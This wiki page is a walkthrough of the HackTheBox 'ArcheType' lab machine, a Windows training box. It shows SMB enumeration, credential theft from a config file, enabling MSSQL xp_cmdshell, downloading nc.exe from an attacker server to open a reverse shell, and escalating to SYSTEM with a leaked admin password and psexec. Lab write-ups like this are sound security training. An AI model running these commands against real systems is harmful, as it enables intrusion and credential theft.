Write-ups/HTB/ArcheType

From Wiki Aghanim
Jump to navigationJump to search
ArcheType
Platform HackTheBox
OS Windows
Difficulty Easy
Techniques SMB, MSSQL


Enumeration

In the enumeration stage I start off by doing an NMAP scan.


sudo nmap -sV -A -p- --script vuln 10.10.10.27 -oN nmap.result

Nmap scan report for 10.10.10.27 Host is up (0.062s latency). Not shown: 65523 closed ports PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds 1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000 |_sslv2-drown: | vulners: | cpe:/a:microsoft:sql_server:2017: | CVE-2007-5090 7.5 https://vulners.com/cve/CVE-2007-5090 | CVE-2021-1636 6.5 https://vulners.com/cve/CVE-2021-1636 | CVE-2019-1068 6.5 https://vulners.com/cve/CVE-2019-1068 |_ CVE-2019-0819 4.0 https://vulners.com/cve/CVE-2019-0819 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-csrf: Couldn't find any CSRF vulnerabilities. |_http-dombased-xss: Couldn't find any DOM based XSS. |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-csrf: Couldn't find any CSRF vulnerabilities. |_http-dombased-xss: Couldn't find any DOM based XSS. |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49669/tcp open msrpc Microsoft Windows RPC Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results: | smb-vuln-ms08-067: | VULNERABLE: | Microsoft Windows system vulnerable to remote code execution (MS08-067) | State: LIKELY VULNERABLE | IDs: CVE:CVE-2008-4250 | The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, | Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary | code via a crafted RPC request that triggers the overflow during path canonicalization. | | Disclosure date: 2008-10-23 | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250 |_ https://technet.microsoft.com/en-us/library/security/ms08-067.aspx |_smb-vuln-ms10-054: false |_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND



There are a couple of interesting ports open, among other things port 445 (SMB) and 1433 (mssql).


I'll run 'enum4linux' against the server. The interesting take from that scan was that it dosent require username or password to connect to SMB.


enum4linux -H 10.10.10.27 

====================================

| Session Check on 10.10.10.27 | 

====================================

[+] Server 10.10.10.27 allows sessions using username , password [+] Got domain/workgroup name:



We'll try and connect to SMB using 'smbclient'.


smbclient -L //10.10.10.27

Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin backups Disk C$ Disk Default share IPC$ IPC Remote IPC


  1. Connect to backups

smbclient //10.10.10.27/backups smb: \> ls 

 .                                   D        0  Mon Jan 20 12:20:57 2020
 ..                                  D        0  Mon Jan 20 12:20:57 2020
 prod.dtsConfig                     AR      609  Mon Jan 20 12:23:02 2020

10328063 blocks of size 4096. 8248445 blocks available smb: \> get prod.dtsConfig

cat prod.dtsConfig 




       Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;




Gain access

I found a username and a password. I will use those creds to try and connect to mssql. Using impackts'mssqlclient.py' to connect to mssql.


mssqlclient.py ARCHETYPE/sql_svc@10.10.10.27 -windows-auth Impacket v0.9.24.dev1 - Copyright 2021 SecureAuth Corporation

Password:

SQL> help 

    lcd {path}                 - changes the current local directory to {path}
    exit                       - terminates the server process (and this session)
    enable_xp_cmdshell         - you know what it means
    disable_xp_cmdshell        - you know what it means
    xp_cmdshell {cmd}          - executes cmd using xp_cmdshell
    sp_start_job {cmd}         - executes cmd using the sql server agent (blind)
    ! {cmd}                    - executes a local shell cmd



From the help menu I can see that I can execute arbitrary commands on the SQL server. I'll use int0x33's 'nc.exe', send this to the target machine, and try and get a reverse shell.


  1. Terminal 1 attacker - in the same dir as nc.exe

sudo python3 -m http.server 8080

  1. Terminal 2 target SQL

SQL> enable_xp_cmdshell SQL> reconfigure SQL> xp_cmdshell "powershell wget http://10.10.14.117:8080/nc.exe -OutFile %temp%/nc.exe" output

NULL

  1. Terminal 1 attacker - nc.exe is sent from attacker to target

10.10.10.27 - - [17/Jun/2021 07:59:41] "GET /nc.exe HTTP/1.1" 200 -

  1. Terminal 3 attacker

sudo rlwrap nc -nlvp 443 listening on [any] 443 ...

  1. Terminal 2 target SQL

SQL> xp_cmdshell "%temp%/nc.exe -nv 10.10.14.117 443 -e cmd.exe"

  1. Target 3 attacker - reverse shell

connect to [10.10.14.117] from (UNKNOWN) [10.10.10.27] 49716 Microsoft Windows [Version 10.0.17763.107] (c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami archetype\sql_svc



rlwrap gives us access to history, tab autocompletion and the arrow keys immediately upon receiving a shell.



PrivSec

Using carlospolop'swinPEAS.bat we can find possible privsec vectors. Its an amazing tool that you should have in your toolbox. Its available for Linux aswell.


We'll send the 'winPEAS.bat' to the target using http.server.


SQL> xp_cmdshell "powershell wget http://10.10.14.117:8080/winPEASbat -OutFile %temp%/winpeas.bat"

  1. From the reverse shell

C:\Users\sql_svc> cd %temp% C:\Users\sql_svc\AppData\Local\Temp>winpeas.bat


This will run the winpeas.bat, and it takes a while to run. From the winpeas.bat we find an interesting file 'C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine'. From the file we find the password for 'administrator' , which is 'MEGACORP_4dm1n!!'. Using that info, we can use impackts psexec.py to login to administrator and get the root flag.


psexec.py administrator@10.10.10.27 Impacket v0.9.24.dev1 - Copyright 2021 SecureAuth Corporation

Password: [*] Requesting shares on 10.10.10.27..... [*] Found writable share ADMIN$ [*] Uploading file FfeDRNaS.exe [*] Opening SVCManager on 10.10.10.27..... [*] Creating service qkmG on 10.10.10.27..... [*] Starting service qkmG..... [!] Press help for extra shell commands Microsoft Windows [Version 10.0.17763.107] (c) 2018 Microsoft Corporation. All rights reserved.


C:\Windows\system32>whoami nt authority\system

C:\Users\Administrator>cd Desktop

C:\Users\Administrator>dir 

Directory of C:\Users\Administrator\Desktop

01/20/2020 06:42 AM . 01/20/2020 06:42 AM .. 02/25/2020 07:36 AM 32 root.txt 

              1 File(s)             32 bytes
              2 Dir(s)  33,822,023,680 bytes free


Retrieved from "https://book.ghanim.no/index.php?title=Write-ups/HTB/ArcheType&oldid=1141"